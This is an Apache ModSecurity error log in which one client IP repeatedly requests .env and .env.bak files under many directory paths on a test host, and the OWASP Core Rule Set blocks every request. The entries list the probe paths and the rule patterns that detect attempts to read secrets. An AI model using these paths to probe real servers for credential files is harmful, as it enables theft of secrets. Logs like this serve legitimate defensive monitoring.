[Fri Dec 19 21:13:51.347787 2025] [:error] [pid 850607] [client 45.148.10.159:60964] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mail/.env"] [unique_id "aUWx_3Px2lx5B6vbh26PVgAAAAE"]
[Fri Dec 19 21:13:51.719449 2025] [:error] [pid 850608] [client 45.148.10.159:60970] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUWx_xjw2n6yIrI5luNkOwAAAAM"]
[Fri Dec 19 21:13:51.719729 2025] [:error] [pid 850608] [client 45.148.10.159:60970] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUWx_xjw2n6yIrI5luNkOwAAAAM"]
[Fri Dec 19 21:13:51.719938 2025] [:error] [pid 850608] [client 45.148.10.159:60970] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/mailer/.env"] [unique_id "aUWx_xjw2n6yIrI5luNkOwAAAAM"]
[Fri Dec 19 21:13:51.819746 2025] [:error] [pid 850608] [client 45.148.10.159:60970] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUWx_xjw2n6yIrI5luNkPAAAAAM"]
[Fri Dec 19 21:13:51.819962 2025] [:error] [pid 850608] [client 45.148.10.159:60970] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUWx_xjw2n6yIrI5luNkPAAAAAM"]
[Fri Dec 19 21:13:51.820153 2025] [:error] [pid 850608] [client 45.148.10.159:60970] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/nginx/.env"] [unique_id "aUWx_xjw2n6yIrI5luNkPAAAAAM"]
[Fri Dec 19 21:13:52.046947 2025] [:error] [pid 850609] [client 45.148.10.159:60978] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUWyAMMHI_7HAr6pD1acswAAAAU"]
[Fri Dec 19 21:13:52.047217 2025] [:error] [pid 850609] [client 45.148.10.159:60978] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUWyAMMHI_7HAr6pD1acswAAAAU"]
[Fri Dec 19 21:13:52.047396 2025] [:error] [pid 850609] [client 45.148.10.159:60978] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUWyAMMHI_7HAr6pD1acswAAAAU"]
[Fri Dec 19 21:13:59.314439 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgTwAAAAY"]
[Fri Dec 19 21:13:59.314707 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgTwAAAAY"]
[Fri Dec 19 21:13:59.314887 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/site/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgTwAAAAY"]
[Fri Dec 19 21:13:59.378682 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /xampp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgUAAAAAY"]
[Fri Dec 19 21:13:59.378905 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgUAAAAAY"]
[Fri Dec 19 21:13:59.379071 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/xampp/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgUAAAAAY"]
[Fri Dec 19 21:13:59.446781 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /main/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgUQAAAAY"]
[Fri Dec 19 21:13:59.446992 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgUQAAAAY"]
[Fri Dec 19 21:13:59.447154 2025] [:error] [pid 850610] [client 45.148.10.159:43994] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/main/.env"] [unique_id "aUWyB4EmEm_Z-LrykDqgUQAAAAY"]
[Fri Dec 19 21:13:59.631564 2025] [:error] [pid 839886] [client 45.148.10.159:44004] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node_modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUWyB1i5HgpQVmqH-SUAjgAAAAc"]
[Fri Dec 19 21:13:59.631810 2025] [:error] [pid 839886] [client 45.148.10.159:44004] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUWyB1i5HgpQVmqH-SUAjgAAAAc"]
[Fri Dec 19 21:13:59.631971 2025] [:error] [pid 839886] [client 45.148.10.159:44004] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/node_modules/.env"] [unique_id "aUWyB1i5HgpQVmqH-SUAjgAAAAc"]
[Fri Dec 19 21:13:59.891574 2025] [:error] [pid 834992] [client 45.148.10.159:44006] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUWyB2UkfshjVnOZlCKIxwAAAAI"]
[Fri Dec 19 21:13:59.891795 2025] [:error] [pid 834992] [client 45.148.10.159:44006] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUWyB2UkfshjVnOZlCKIxwAAAAI"]
[Fri Dec 19 21:13:59.891966 2025] [:error] [pid 834992] [client 45.148.10.159:44006] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUWyB2UkfshjVnOZlCKIxwAAAAI"]
[Fri Dec 19 21:13:59.963874 2025] [:error] [pid 834992] [client 45.148.10.159:44006] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUWyB2UkfshjVnOZlCKIyAAAAAI"]
[Fri Dec 19 21:13:59.964099 2025] [:error] [pid 834992] [client 45.148.10.159:44006] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUWyB2UkfshjVnOZlCKIyAAAAAI"]
[Fri Dec 19 21:13:59.964289 2025] [:error] [pid 834992] [client 45.148.10.159:44006] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aUWyB2UkfshjVnOZlCKIyAAAAAI"]
[Fri Dec 19 21:14:00.244621 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspUAAAAAg"]
[Fri Dec 19 21:14:00.244842 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspUAAAAAg"]
[Fri Dec 19 21:14:00.245015 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/prod/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspUAAAAAg"]
[Fri Dec 19 21:14:00.320410 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUWyCOQyAZTrDtMMzDspUQAAAAg"]
[Fri Dec 19 21:14:00.321177 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUWyCOQyAZTrDtMMzDspUQAAAAg"]
[Fri Dec 19 21:14:00.321445 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUWyCOQyAZTrDtMMzDspUQAAAAg"]
[Fri Dec 19 21:14:00.321637 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env.bak"] [unique_id "aUWyCOQyAZTrDtMMzDspUQAAAAg"]
[Fri Dec 19 21:14:00.747019 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /website/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVQAAAAg"]
[Fri Dec 19 21:14:00.747231 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVQAAAAg"]
[Fri Dec 19 21:14:00.747398 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/website/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVQAAAAg"]
[Fri Dec 19 21:14:00.836511 2025] [:error] [pid 839889] [client 45.148.10.159:44008] [client 45.148.10.159] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /development/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/development/.env"] [unique_id "aUWyCOQyAZTrDtMMzDspVgAAAAg"]
